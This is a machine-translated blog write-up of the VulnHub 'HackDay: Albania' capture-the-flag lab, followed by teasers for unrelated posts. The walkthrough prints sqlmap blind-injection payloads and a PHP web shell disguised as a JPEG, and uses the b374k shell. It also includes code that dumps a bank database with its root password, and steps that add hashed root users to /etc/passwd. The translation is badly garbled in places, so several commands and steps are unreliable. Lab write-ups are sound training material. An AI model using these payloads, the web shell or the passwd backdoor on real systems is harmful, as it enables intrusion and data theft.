VulnHub Analysis HackDay: Albania

Continue parsing the lab with VulnHub. This time we'll do HackDay: Albania. As a following description, which shows that it is a task with a HackDay Albania''s 2016 CTF
This was used in HackDay Albania''s 2016 CTF.
The level is beginner to intermediate.
It uses DHCP.
Note: VMware users may have issues with the network interface doing down by default. We recommend (for once!) using Virtualbox.

Task and last designed for beginners. So at some point the article will be discussed in more detail.

the

Start


Run the downloaded image in VirtualBox, and then download the with Nmap looking for open ports:

the 
sudo nmap 192.168.1.1-255-sV

Starting Nmap 7.01 ( nmap.org ) at 2016-12-18 00:03 MSK
Nmap scan report for 192.168.1.44
Host is up (0.0013 s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Go to 192.168.1.44:8008 see a popup window



And the comments in the page code:
OK, ketu por jo :)

View the contents of the file robots.txt

robots.txt
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

Try to go to visit one of these directories, we open the file index.html, here's a picture:


background.jpg

Using the translator, we understand that this is not a directory. To test all, I use the following script dirsearch.

Run:

the 
sudo python3 robotscan.py -u http://192.168.1.44:8008 -e php,txt,html,json,. bak,. jpg 403 x-w /usr/share/dirb/wordlists/big.txt

After the scan is complete, you can see that in one of the directories /unisxcudkqjydw/ is missing the file background.jpg



After navigating to this directory in the browser, see this answer:
IS there any /vulnbank/ in there ???

Watching the contents of the directory /vulnbank/ get to the login page:



Check for the sql injection:

the 
sudo sqlmap -u 'http://192.168.1.44:8008/unisxcudkqjydw/vulnbank/client/login.php' --data='username=admin&password=admin' --random-agent --level=5 --risk=3

And get the answer:
sqlmap resumed the following injection point(s) from stored session:
— Parameter: username (POST)
Type: boolean-based blind
Title: RLIKE MySQL boolean-based blind — WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=admin' RLIKE (SELECT (CASE WHEN (9555=9555) THEN 0x61646d696e ELSE 0x28 END))-- pSKE&password=admin

Type: AND/OR time-based blind
Title: MySQL >= RLIKE 5.0.12 time-based blind
Payload: username=admin' RLIKE SLEEP(5)-- DBgy&password=admin

Attempts stampit the contents of the tables to were not successful, sqlmap all gave an error: [CRITICAL] unable to retrieve the number of database users.

Try to manually run the query with data: username=admin' RLIKE SLEEP(5)-- DBgy&password=admin

And suddenly redirects to a profile to a user:

Hidden text


Great! We have the option of downloading the file, try something to fill in, and in response receive the message:
After we got hacked we our allowing only image files to upload such as jpg, jpeg, bmp...etc

OK, create a file

shell.jpg
<?php system($_GET['cmd']); ?>


Fill it and get the message that everything went well. The downloaded file goes into a directory upload, and is available here:
192.168.1.44:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=id.

But instead cherished Shela get the message:
Warning: system(): Unable to fork [id] in /var/www/html/unisxcudkqjydw/vulnbank/client/upload/shell.jpg on line 1

After trying several options, we find that we face the most common php include, without the ability to execute system commands.

Bun when using php shell
Pour through the form of sending tickets shell b374k
Run BurpSuite and there is a custom rule:

P. S. without him BurpSuite each time the query view_file.php?filename=myShell.jpg add ?filename=myShell.jpg that will cause errors.

Run our shell, and rename the file upload/myShell.jpg upload/myShell.php.
More BurpSuite we do not need. now shell we have available at 192.168.1.44:8008/unisxcudkqjydw/vulnbank/client/upload/myShell.php

Can pull from a clients database and their passwords:

Hidden text
function execute_query($sql){
$db_host = "127.0.0.1";
$db_name = "bank_database";
$db_user = "root";
$db_password = "NuCiGoGo321";
$con=mysqli_connect($db_host,$db_user,$db_password,$db_name);
if(mysqli_connect_errno()){
echo "Failed to connect to MySQL:" . mysqli_connect_error();
die(0);
}
$response = mysqli_query($con,$sql);
mysqli_close($con);
return $response;
}
$result = execute_query("SELECT * FROM klienti;");
while($row = $result->fetch_assoc()) { print_r($row); }


Looking through the files and directories find this entry:
passwd 1.58 KB root:root -rw-r--rw - 22-Oct-2016 17:21:42

Well, we can create a user. Create your password hash is admin:

the 
openssl passwd -1 -salt admin admin

Next, insert through existing shell insert in the file /etc/passwd the following entry

the 
gh0st3rs:$1$admin$1kgWpnZpUx.vTroWPXPIB0:1001:0:GH0st3rs:/:/bin/bash
admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0:admin:/:/bin/bash

PS Add two users, because you connect via ssh from root was available. You can add only the root, and all other actions to do log in to the dev, but I prefer ssh.

Connects via ssh under the user gh0st3rs, then run the command

the 
su admin

And after entering the password, get root privileges in this virtual machine.

It is small, it remains to find the flag.

the 
root@hackday:/# find / -name "*flag*"
root@hackday:/# cat /root/flag.txt
Urime, 
Tani nis raportin!

d5ed38fdbf28bc4e58be142cf5a17cf5
root@hackday:/#

PS After decoding, we learn that the flag is md5 from rio
Article based on information from habrahabr.ru

Комментарии

Отправить комментарий

Популярные сообщения из этого блога

The use of Lisp in production

Изображение
Grammarly the heart of our business — Central language features — written in Common Lisp. Now the engine handles more than a thousand sentences per second, massturbate horizontally and reliably serves us in production for almost 3 years. We have noticed that there are almost no posts about the deployment of Lisp software in a modern cloud infrastructure, so we decided to share our experiences is a good idea. Runtime and programming environment of Lisp provides several unique, a bit unusual, capabilities to support production systems (for the impatient — they are described in the last part). Wut Lisp?!! Contrary to popular opinion, Lisp is incredibly practical for production systems. Just put, around us, many Lisp systems: when you are looking for air ticket on Hipmunk or riding the subway in London, used a Lisp program. Our Lisp-conceptual services represent a classic AI app that operates on a huge pile of knowledge created by linguists and researchers. Its main us...
Далее...

FreeBSD + PostgreSQL: tuning the database server

Hello, Charcoaldust! Probably, my article will be of no interest hardened sysadmin and copy-paste seem. But I'm addressing it to those who, like me, being the only developer for the first time faced with the need also to administrate the server, thus solving the problem of highly loaded database. And to Google you are not cursed, try to gather in one place the basic techniques for acceleration of the database server, which I have successfully managed to implement. The input data my problem is the following: dual processor (Intel Xeon) machine, 8 hard drives at 500GB and 12Gb of RAM. And complete, including physical, access to this good. Task: to arrange a fast database server based on FreeBSD and PostgreSQL. 1. RAID The correct partitioning of the available hard drives on raids we need to be PostgreSQL, as tablespacing (more on this below). Your 8 hard I broke into pairs and organized in this way: two pairs unite in RAID1 and two pairs in RAID0 (actually, for our...
Далее...

As we did a free Noodle for iOS and how we plan to earn

Изображение
Since the beginning of this year we with friends make known multiplayer word game for iOS – Balda Online . For those who have not played the Noodle: the game is played on a field of 5x5. There is a start word of 5 letters. Players in turn add one letter, until the end of the cell. The course is given 2 minutes. The longer the words the more points. In the game important qualities such as erudition, quickness of mind, memory, composure and calculation. We have set ourselves the task to make the world's best Noodle and strive to achieve this goal, constantly introducing new and new features. The interest in the game is big enough: Baldev is playing Online 12 thousand people every day (up to 1000 players simultaneously at peak time), daily spending more than 25 thousand games. We are confident that we will be able to increase these figures significantly. By the way, information about the current number of players is displayed right on the main page. Download game to s...
Далее...